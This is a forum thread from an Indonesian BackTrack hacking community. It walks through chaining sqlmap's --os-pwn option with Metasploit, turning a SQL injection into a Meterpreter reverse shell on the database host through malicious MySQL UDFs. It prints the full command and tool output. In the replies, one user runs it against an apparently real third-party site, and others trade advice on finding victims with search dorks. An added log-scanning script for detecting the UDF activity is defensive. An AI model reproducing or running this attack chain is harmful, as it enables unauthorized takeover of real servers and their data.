Indonesian Back|Track Team
Integrating SQLMAP with METASPLOIT


Integrating SQLMAP with METASPLOIT - zee eichel - 12-06-2012

As a framework, Metasploit is able to integrate with various other tools .. as an example, this time I will integrate Metasploit with sqlmap, a tool for analyzing vulnerabilities in SQL databases :-bd

For a tutorial on sqlmap .. you can look at

http://indonesianbacktrack.or.id/forum/search.php?action=results&sid=f0fdce9f5e744ca3b7a346873a5a69df&sortby=&order=desc

Code:
root@dracos:/pentest/vulnerability-assestment/database-scanner/sqlmap# ./sqlmap.py -u "http://localhost.com/example.aspx?id=1" --os-pwn --msf-path /opt/metasploit-4.4.0/msf3/

For now, sorry, I am using dracos linux as the example ... you can adapt it to your own pentest OS

Code:
root@dracos:/pentest/vulnerability-assestment/database-scanner/sqlmap# ./sqlmap.py -u "http://situs-target.com/pagevulner.aspx?id=1" --os-pwn --msf-path /opt/metasploit-4.4.0/msf3/

some shit for a walker area ...

Code:
[INFO] the back-end DBMS is MySQL
web server operating system: Windows 2003
web application technology: ASP.NET, ASP.NET 4.0.30319, Microsoft IIS 6.0
back-end DBMS: MySQL 5.0
[12:9:13] [INFO] fingerprinting the back-end DBMS operating system
[12:9:15] [INFO] the back-end DBMS operating system is Windows
how do you want to establish the tunnel?
[1] TCP: Metasploit Framework (default)
[2] ICMP: icmpsh - ICMP tunneling
>
[16:10:05] [INFO] testing if current user is DBA
[12:10:15] [INFO] fetching current user
what is the back-end database management system architecture?
[1] 32-bit (default)
[2] 64-bit
>
[12:10:07] [INFO] checking if UDF 'sys_bineval' already exist
[12:10:08] [INFO] checking if UDF 'sys_exec' already exist
[12:10:10] [INFO] detecting back-end DBMS version from its banner
[12:10:12] [INFO] retrieving MySQL base directory absolute path
[12:10:13] [INFO] creating UDF 'sys_bineval' from the binary UDF file
[12:10:15] [INFO] creating UDF 'sys_exec' from the binary UDF file
how do you want to execute the Metasploit shellcode on the back-end database underlying operating system?
[1] Via UDF 'sys_bineval' (in-memory way, anti-forensics, default)
[2] Stand-alone payload stager (file system way)
>
[hh:mm:29] [INFO] creating Metasploit Framework 3 multi-stage shellcode
which connection type do you want to use?
[1] Reverse TCP: Connect back from the database host to this machine (default)
[2] Reverse TCP: Try to connect back from the database host to this machine, on all ports
between the specified and 65535
[3] Bind TCP: Listen on the database host for a connection
>
which is the local address? [xxx.xxx.xxx.xxx]
which local port number do you want to use? [555]
which payload do you want to use?
[1] Meterpreter (default)
[2] Shell
[3] VNC
>
[12:10:15] [INFO] creation in progress ... done
[12:10:16] [INFO] running Metasploit Framework 3 command line interface locally, please wait..

=[ metasploit v3.8.0-dev [core:3.8 api:1.0]
+ -- --=[ 688 exploits - 357 auxiliary - 39 post
+ -- --=[ 217 payloads - 27 encoders - 8 nops
=[ svn r12655 updated today (2012.12.06)

PAYLOAD => windows/meterpreter/reverse_tcp
EXITFUNC => thread
LPORT => 555
LHOST => xxx.xxx.xxx.xxx
[*] Started reverse handler on xxx.xxx.xxx.xxx:555
[*] Starting the payload handler...
[hh:mm:48] [INFO] running Metasploit Framework 3 shellcode remotely via UDF 'sys_bineval',
please wait..
[*] Sending stage (749056 bytes) to xxx.xxx.xxx.xxx
[*] Meterpreter session 1 opened (xxx.xxx.xxx.xxx:9128 -> xxx.xxx.xxx.xxx:555) at Thu Dec 06

and the meterpreter session opens ..
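Added example, not part of the original post or of sqlmap/Metasploit: a defender-side check that scans a MySQL general query log for the UDF activity the output above reports (creation and use of 'sys_exec' and 'sys_bineval'). It assumes the general query log is enabled; the log lines, the library name `libsabcd.dll` and the `scan` function are constructed for illustration.

```python
import re

# UDF names the sqlmap output quoted in the post reports creating.
PAGE_UDF_NAMES = {"sys_exec", "sys_bineval"}

# CREATE [AGGREGATE] FUNCTION <name> RETURNS <type> SONAME '<library>'
CREATE_UDF = re.compile(
    r"CREATE\s+(?:AGGREGATE\s+)?FUNCTION\s+`?(?P<name>\w+)`?\s+"
    r"RETURNS\s+\w+\s+SONAME\s+'(?P<lib>[^']+)'",
    re.IGNORECASE,
)
# Invocation of one of the named UDFs, e.g. SELECT sys_exec(...)
CALL_UDF = re.compile(r"\b(sys_exec|sys_bineval)\s*\(", re.IGNORECASE)

# Constructed sample in a simplified general-query-log layout (not real data).
SAMPLE_LOG = (
    "121206 12:10:01\t   41 Query\tSELECT title FROM events WHERE id=5\n"
    "121206 12:10:13\t   41 Query\tCREATE FUNCTION sys_bineval RETURNS int SONAME 'libsabcd.dll'\n"
    "121206 12:10:15\t   41 Query\tCREATE FUNCTION sys_exec RETURNS int SONAME 'libsabcd.dll'\n"
    "121206 12:11:02\t   57 Query\tCREATE FUNCTION metaphon RETURNS STRING SONAME 'udf_example.so'\n"
    "121206 12:11:48\t   41 Query\tSELECT sys_bineval('<constructed>')\n"
    "121206 12:12:30\t   41 Query\tDROP FUNCTION sys_exec\n"
)


def scan(log_text):
    """Return (line_no, event, udf_name, library, severity) tuples."""
    findings = []
    for line_no, line in enumerate(log_text.splitlines(), 1):
        created = CREATE_UDF.search(line)
        if created:
            name = created.group("name").lower()
            # Any new UDF deserves a look; the names from the post are urgent.
            severity = "high" if name in PAGE_UDF_NAMES else "review"
            findings.append((line_no, "udf_created", name, created.group("lib"), severity))
            continue
        called = CALL_UDF.search(line)
        if called:
            findings.append((line_no, "udf_called", called.group(1).lower(), None, "high"))
    return findings


if __name__ == "__main__":
    for finding in scan(SAMPLE_LOG):
        print(finding)
```

The run in the post depends on the web application's database account being allowed to create UDFs (the output shows sqlmap testing whether the current user is DBA); an application account without administrative rights on the `mysql` schema and without the FILE privilege removes that path.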



RE: Integrating SQLMAP with METASPLOIT - ardian - 12-06-2012

great stuff, bro zee.. I'm giving you a thanks for this,,hehehe


RE: Integrating SQLMAP with METASPLOIT - Clound_Carbelius - 12-06-2012

I don't really understand, bro Sad( Sad(
bro, bro, \m/
I ran this
Quote:./sqlmap.py -u "http://www.schubertensemble.com/events.php?id=5" --os-pwn --msf-path /opt/metasploit-4.4.0/msf3/

a question came up like in this picture
[Image: 55mgci.png]

and then Msf doesn't come up Undecided


RE: Integrating SQLMAP with METASPLOIT - czeroo_cool - 12-06-2012

(12-06-2012, 05:01 PM)Clound_Carbelius Wrote: I don't really understand, bro Sad( Sad(
bro, bro, \m/
I ran this
Quote:./sqlmap.py -u "/events.php?id=5" --os-pwn --msf-path /opt/metasploit-4.4.0/msf3/

a question came up like in this picture


and then Msf doesn't come up Undecided


It looks like your website document file isn't quite right, clound, :d



RE: Integrating SQLMAP with METASPLOIT - Clound_Carbelius - 12-06-2012

(12-06-2012, 05:45 PM)czeroo_cool Wrote:
(12-06-2012, 05:01 PM)Clound_Carbelius Wrote: bro, bro, \m/
I ran this
Quote:./sqlmap.py -u "/events.php?id=5" --os-pwn --msf-path /opt/metasploit-4.4.0/msf3/

a question came up like in this picture


and then Msf doesn't come up Undecided


It looks like your website document file isn't quite right, clound, :d

hmm, I see :-bd
share a dork with me, bro, please :d :-?


RE: Integrating SQLMAP with METASPLOIT - zee eichel - 12-06-2012

what's missing is the metasploit path, bro, that one is wrong .. is that really the path?


RE: Integrating SQLMAP with METASPLOIT - czeroo_cool - 12-06-2012

(12-06-2012, 05:57 PM)zee eichel Wrote: what's missing is the metasploit path, bro, that one is wrong .. is that really the path?

The folder can just be changed Big Grin

@Clound ... Just look for ASP dorks, bro..


RE: Integrating SQLMAP with METASPLOIT - koecroet - 12-06-2012

(12-06-2012, 05:01 PM)Clound_Carbelius Wrote: I don't really understand, bro Sad( Sad(
bro, bro, \m/
I ran this
Quote:./sqlmap.py -u "/events.php?id=5" --os-pwn --msf-path /opt/metasploit-4.4.0/msf3/

a question came up like in this picture


and then Msf doesn't come up Undecided

that's because your target is linux, and then it seems you entered the wrong folder location. you have to know where the victim website's directory is on the filesystem; on linux the default is "/var/www/", you know


RE: Integrating SQLMAP with METASPLOIT - [H2] - 12-06-2012

wow, this is cool, bro..
so if I want to look for tables, columns and dump, how does that work, are the commands still the same as in sqlmap...???


RE: Integrating SQLMAP with METASPLOIT - cyberking - 12-07-2012

hahaha alhamdulillah, learned something new again Big Grin